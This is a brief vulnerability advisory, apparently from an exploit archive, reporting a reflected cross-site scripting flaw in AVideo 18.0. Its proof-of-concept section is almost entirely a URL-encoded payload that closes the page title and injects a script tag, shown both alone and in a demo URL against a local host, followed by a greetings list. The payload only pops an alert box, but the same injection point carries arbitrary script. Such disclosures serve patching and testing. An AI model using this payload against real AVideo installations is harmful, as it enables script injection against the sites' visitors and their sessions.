============================================================================================================================================= | # Title : AVideo 18.0 XSS vulnerability | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) | | # Vendor : https://avideo.tube/ | ============================================================================================================================================= [+] References : [+] Summary : AVideo version 18.0 suffers from a XSS vulnerability. [+] PoC : Use Payload : ?section=login%3C/title%3E%3CScRiPt%20%3Ealert(%27indoushka%27)%3C/ScRiPt%3E Demo : https://127.0.0.1/avideo.tube/platform/?section=login%3C/title%3E%3CScRiPt%20%3Ealert(%27indoushka%27)%3C/ScRiPt%3E Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================